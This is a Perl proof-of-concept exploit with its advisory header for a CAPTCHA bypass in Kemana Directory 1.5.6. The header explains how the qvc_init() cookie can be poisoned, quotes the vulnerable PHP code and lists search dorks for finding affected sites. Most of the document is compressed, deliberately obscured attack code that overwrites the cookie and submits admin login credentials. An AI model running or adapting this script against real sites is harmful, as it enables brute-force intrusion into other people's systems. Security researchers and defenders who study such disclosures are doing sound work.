#!C:\Perl64\bin\perl.exe # # Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit # # # Vendor: C97net # Product web page: http://www.c97.net # Affected version: 1.5.6 # # Summary: Experience the ultimate directory script solution with Kemana. # Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features # including: CMS engine based on our qEngine, multiple directories support, # user friendly administration control panel, easy to use custom fields, # unsurpassed flexibility. # # Desc: The CAPTCHA function for Kemana Directory is prone to a security # bypass vulnerability that occurs in the CAPTCHA authentication routine. # The function 'qvc_init()' in '/includes/function.php' sets a cookie with # a SHA1-based hash value in the Response Header which can be replaced by # a random SHA1 computed hash value using Cookie Poisoning attack. Successful # exploit will allow attackers to bypass the CAPTCHA-based authentication # challenge and perform brute-force attacks. # # # ============================================================================= # /includes/function.php: # ----------------------- # # 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */ # 1775: # 1776: # 1777: // qVC - the simplest visual confirmation engine yet # 1778: // use qvc_init() --> --> compare qvc_value() == sha1 (strtolower($user_input) )? # 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used! # 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F # 1781: function qvc_init ($num = 5) # 1782: { # 1783: if ($num == 3) # 1784: $value = mt_rand (100, 999); # 1785: else # 1786: $value = random_str (5); # 1787: ip_config_update ('visual', $value); # 1788: setcookie ('qvc_value', sha1 ($value), 0, '/'); # 1789: } # 1790: # 1791: # 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value) # 1793: function qvc_value () # 1794: { # 1795: $correct_val = cookie_param ('qvc_value'); # 1796: # 1797: // block browser BACK # 1798: qvc_init (); # 1799: return $correct_val; # 1800: } # ============================================================================= # # # Tested on: Microsoft Windows 7 Professional SP1 (EN) # Apache/2.4.7 (Win32) # PHP/5.5.6 # MySQL 5.6.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2014-5175 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php # # # Dork #1: intitle:powered by c97.net # Dork #2: intitle:powered by qEngine # Dork #3: intitle:powered by Kemana.c97.net # Dork #4: intitle:powered by Cart2.c97.net # # # 08.03.2014 # use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03 $url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass= "admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar); print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_ print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1 print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#]. =~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#("; "joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n"; $cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string ;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$ juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get; "HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\ info(){print" +-----------------------------------------------------+ | | | Kemana Directory CAPTCHA Bypass PoC Exploit | | | | ID: ZSL-2014-5175 | | | +-----------------------------------------------------+ \n\n";}